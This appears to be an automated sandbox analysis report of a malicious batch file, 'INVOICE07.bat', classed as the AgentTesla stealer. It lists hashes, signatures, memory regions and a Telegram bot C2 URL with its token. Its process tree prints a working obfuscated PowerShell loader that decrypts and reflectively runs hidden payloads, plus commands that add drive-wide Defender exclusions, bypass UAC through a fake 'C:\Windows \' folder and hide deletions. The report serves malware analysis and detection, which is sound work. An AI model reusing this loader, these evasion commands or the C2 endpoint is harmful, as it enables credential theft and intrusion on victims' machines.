Analysis

  • max time kernel
    91s
  • max time network
    108s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-06-2024 01:39

General

  • Target

    INVOICE07.bat

  • Size

    540KB

  • MD5

    1952a79579272db52a814baf57821f90

  • SHA1

    3fcfb6c3d2c08e840d758e905c2f304ec39ca9f3

  • SHA256

    e575145995f725fbaecc1b95c73ec0fbdad3117e1f492dc8d93ad076f5ad2da1

  • SHA512

    088de9db26c4eda94bb71a5379118418c06bcb46d8ccce7d1da2719c8d742e8347a4dfde9f73afbb362ef461a0af159408d9150adc8653f6e5a3507408eb6a93

  • SSDEEP

    12288:xToPjPt8r1cxIMTOQo5Xq4PpsXis9Jhqd8FJVqzT+53xH:xeWrOa4UaYpsXlJIdwSIZ

Malware Config

Extracted

Family

agenttesla

C2

https://api.telegram.org/bot7135973864:AAGVqtrGeLysm0FYcz68sQIn3nL2a6CxjMc/

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Detect packed .NET executables. Mostly AgentTeslaV4. 1 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 1 IoCs
  • Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion 1 IoCs
  • Detects executables referencing Windows vault credential objects. Observed in infostealers 1 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 1 IoCs
  • Detects executables referencing many email and collaboration clients. Observed in information stealers 1 IoCs
  • Detects executables referencing many file transfer clients. Observed in information stealers 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\INVOICE07.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1324
    • C:\Windows\system32\cmd.exe
      cmd /c "set __=^&rem"
      2⤵
        PID:3780
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YFEk7bCybDCwVf0wTlX8N4pDcP2M+6VJEGXybuh+8wc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ppkRkLHGStauzXAtFwrtog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWVPe=New-Object System.IO.MemoryStream(,$param_var); $VqYlz=New-Object System.IO.MemoryStream; $hGmEI=New-Object System.IO.Compression.GZipStream($VWVPe, [IO.Compression.CompressionMode]::Decompress); $hGmEI.CopyTo($VqYlz); $hGmEI.Dispose(); $VWVPe.Dispose(); $VqYlz.Dispose(); $VqYlz.ToArray();}function execute_function($param_var,$param2_var){ $NuRNy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Lqnnw=$NuRNy.EntryPoint; $Lqnnw.Invoke($null, $param2_var);}$ITxqM = 'C:\Users\Admin\AppData\Local\Temp\INVOICE07.bat';$host.UI.RawUI.WindowTitle = $ITxqM;$NFyDa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ITxqM).Split([Environment]::NewLine);foreach ($RWjHW in $NFyDa) { if ($RWjHW.StartsWith('beDrwtSuNzbegooyjSZN')) { $bpNTb=$RWjHW.Substring(20); break; }}$payloads_var=[string[]]$bpNTb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        2⤵
          PID:4712
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1528
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3932
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4072
            • C:\Windows \System32\ComputerDefaults.exe
              "C:\Windows \System32\ComputerDefaults.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:4256
              • C:\Windows\SYSTEM32\cmd.exe
                cmd.exe /c call SC.cmd
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:636
                • C:\Windows\system32\cmd.exe
                  cmd /c "set __=^&rem"
                  6⤵
                    PID:4844
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YFEk7bCybDCwVf0wTlX8N4pDcP2M+6VJEGXybuh+8wc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ppkRkLHGStauzXAtFwrtog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWVPe=New-Object System.IO.MemoryStream(,$param_var); $VqYlz=New-Object System.IO.MemoryStream; $hGmEI=New-Object System.IO.Compression.GZipStream($VWVPe, [IO.Compression.CompressionMode]::Decompress); $hGmEI.CopyTo($VqYlz); $hGmEI.Dispose(); $VWVPe.Dispose(); $VqYlz.Dispose(); $VqYlz.ToArray();}function execute_function($param_var,$param2_var){ $NuRNy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Lqnnw=$NuRNy.EntryPoint; $Lqnnw.Invoke($null, $param2_var);}$ITxqM = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $ITxqM;$NFyDa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ITxqM).Split([Environment]::NewLine);foreach ($RWjHW in $NFyDa) { if ($RWjHW.StartsWith('beDrwtSuNzbegooyjSZN')) { $bpNTb=$RWjHW.Substring(20); break; }}$payloads_var=[string[]]$bpNTb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                    6⤵
                      PID:4508
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
                      6⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:396
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1852
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1560

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            944B

            MD5

            bd5940f08d0be56e65e5f2aaf47c538e

            SHA1

            d7e31b87866e5e383ab5499da64aba50f03e8443

            SHA256

            2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

            SHA512

            c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            944B

            MD5

            ba169f4dcbbf147fe78ef0061a95e83b

            SHA1

            92a571a6eef49fff666e0f62a3545bcd1cdcda67

            SHA256

            5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

            SHA512

            8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

          • C:\Users\Admin\AppData\Local\Temp\SC.cmd

            Filesize

            540KB

            MD5

            1952a79579272db52a814baf57821f90

            SHA1

            3fcfb6c3d2c08e840d758e905c2f304ec39ca9f3

            SHA256

            e575145995f725fbaecc1b95c73ec0fbdad3117e1f492dc8d93ad076f5ad2da1

            SHA512

            088de9db26c4eda94bb71a5379118418c06bcb46d8ccce7d1da2719c8d742e8347a4dfde9f73afbb362ef461a0af159408d9150adc8653f6e5a3507408eb6a93

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wcc0r1tt.w1t.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows \System32\ComputerDefaults.exe

            Filesize

            80KB

            MD5

            d25a9e160e3b74ef2242023726f15416

            SHA1

            27a9bb9d7628d442f9b5cf47711c906e3315755b

            SHA256

            7b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c

            SHA512

            bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910

          • C:\Windows \System32\MLANG.dll

            Filesize

            122KB

            MD5

            e286ada1af4b08fa4b7c78f862883c4e

            SHA1

            798ebc7b7cd3db667f1a59ade299be4cff397f39

            SHA256

            16eb71b68025711fdbc93229fde22ecc73dc8a23be8b40700772b96978187ea3

            SHA512

            fbbbc893388a39e94d8b2265aef75dbaf5fd928fadabd3dbfc5cbee64b600de0102b82e5d2b5c56efe128b45f6ddd4bba2668194c05decdfa78c8e7e382de3f5

          • memory/396-82-0x000001B666170000-0x000001B6661C0000-memory.dmp

            Filesize

            320KB

          • memory/396-70-0x000001B666090000-0x000001B6660D2000-memory.dmp

            Filesize

            264KB

          • memory/396-55-0x00007FFFFE8F0000-0x00007FFFFEAE5000-memory.dmp

            Filesize

            2.0MB

          • memory/396-56-0x00007FFFFDA10000-0x00007FFFFDACE000-memory.dmp

            Filesize

            760KB

          • memory/1528-14-0x0000024331430000-0x00000243314A6000-memory.dmp

            Filesize

            472KB

          • memory/1528-12-0x0000024331360000-0x00000243313A4000-memory.dmp

            Filesize

            272KB

          • memory/1528-1-0x0000024330BD0000-0x0000024330BF2000-memory.dmp

            Filesize

            136KB

          • memory/1528-11-0x00007FFFE0890000-0x00007FFFE1351000-memory.dmp

            Filesize

            10.8MB

          • memory/1528-81-0x00007FFFE0890000-0x00007FFFE1351000-memory.dmp

            Filesize

            10.8MB

          • memory/1528-18-0x00000243313B0000-0x0000024331416000-memory.dmp

            Filesize

            408KB

          • memory/1528-16-0x00007FFFFE8F0000-0x00007FFFFEAE5000-memory.dmp

            Filesize

            2.0MB

          • memory/1528-17-0x00007FFFFDA10000-0x00007FFFFDACE000-memory.dmp

            Filesize

            760KB

          • memory/1528-15-0x0000024330FA0000-0x0000024330FB0000-memory.dmp

            Filesize

            64KB

          • memory/1528-0-0x00007FFFE0893000-0x00007FFFE0895000-memory.dmp

            Filesize

            8KB

          • memory/1528-13-0x00007FFFE0890000-0x00007FFFE1351000-memory.dmp

            Filesize

            10.8MB

          • memory/3932-29-0x00007FFFE0890000-0x00007FFFE1351000-memory.dmp

            Filesize

            10.8MB

          • memory/3932-28-0x00007FFFE0890000-0x00007FFFE1351000-memory.dmp

            Filesize

            10.8MB

          • memory/3932-33-0x00007FFFE0890000-0x00007FFFE1351000-memory.dmp

            Filesize

            10.8MB

          • memory/3932-30-0x00007FFFE0890000-0x00007FFFE1351000-memory.dmp

            Filesize

            10.8MB